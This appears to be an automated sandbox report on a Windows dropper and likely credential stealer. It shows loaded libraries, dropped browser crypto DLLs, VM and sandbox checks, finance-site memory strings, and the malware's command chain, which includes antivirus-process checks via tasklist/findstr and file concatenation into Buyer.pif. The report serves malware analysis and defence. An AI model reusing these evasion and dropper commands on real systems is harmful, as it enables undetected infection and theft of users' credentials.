                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: mozglue.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: freebl3.pdb source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: mozglue.pdbP source: Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561231245.000000006C44D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                    Source: Binary string: freebl3.pdbp source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: nss3.pdb@ source: Buyer.pif, 0000000B.00000002.2561551186.000000006C60F000.00000002.00000001.01000000.00000008.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
                    Source: Binary string: softokn3.pdb@ source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Buyer.pif, 0000000B.00000002.2554138012.000000002B617000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Buyer.pif, 0000000B.00000002.2549888344.000000001F737000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                    Source: Binary string: nss3.pdb source: Buyer.pif, 0000000B.00000002.2561551186.000000006C60F000.00000002.00000001.01000000.00000008.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: mozglue.pdb source: Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561231245.000000006C44D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                    Source: Binary string: softokn3.pdb source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                    Source: freebl3.dll.11.drStatic PE information: section name: .00cfg
                    Source: mozglue.dll.11.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.11.drStatic PE information: section name: .didat
                    Source: softokn3.dll.11.drStatic PE information: section name: .00cfg
                    Source: nss3.dll.11.drStatic PE information: section name: .00cfg
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F60DC6 push ecx; ret 11_2_00F60DD9

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with a suspicious file extension
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FD23FC IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00FD23FC
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F5F64C GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,11_2_00F5F64C
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Found API chain indicative of sandbox detection
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_11-106979
                    Found stalling execution ending in API Sleep call
                    Source: C:\Users\user\Desktop\file.exeStalling execution: Execution stalls by calling Sleepgraph_0-3897
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifAPI coverage: 3.7 %
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 4984Thread sleep count: 84 > 30Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FAE1AC GetFileAttributesW,FindFirstFileW,FindClose,11_2_00FAE1AC
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FAD98E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00FAD98E
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FBA29A FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00FBA29A
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB6406 FindFirstFileW,FindNextFileW,FindClose,11_2_00FB6406
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F7C5F3 FindFirstFileExW,11_2_00F7C5F3
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB70FE FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00FB70FE
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB705D FindFirstFileW,FindClose,11_2_00FB705D
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FAD65B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00FAD65B
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB9DB1 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00FB9DB1
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB9F0C SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00FB9F0C
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F44E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00F44E68
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\447331Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\447331\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                    Source: Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ive Brokers - GDCDYNVMware20,11696428655p
                    Source: Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: Buyer.pif, 0000000B.00000002.2537199925.0000000003ABA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Buyer.pif, 0000000B.00000002.2536816271.0000000001381000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Buyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                    Source: Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: x.intuit.comVMware20,11696428655t
                    Source: Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: nara Change Transaction PasswordVMware20,1169642/Iwx^;
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FBF229 BlockInput,11_2_00FBF229
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F728E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00F728E2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F65038 mov eax, dword ptr fs:[00000030h]11_2_00F65038
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FA1244 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_00FA1244
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F728E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00F728E2
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F60B8F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00F60B8F
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F60D25 SetUnhandledExceptionFilter,11_2_00F60D25
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F60F71 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00F60F71
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: Buyer.pif PID: 2380, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FA18E3 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00FA18E3
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F82F58 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00F82F58
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F5F64C GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,11_2_00F5F64C
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FAE9FA mouse_event,11_2_00FAE9FA
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 447331Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "typesfaxincreasecompound" Ensemble Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Compile + Olive + Within + Psychiatry 447331\pJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Buyer.pif pJump to behavior
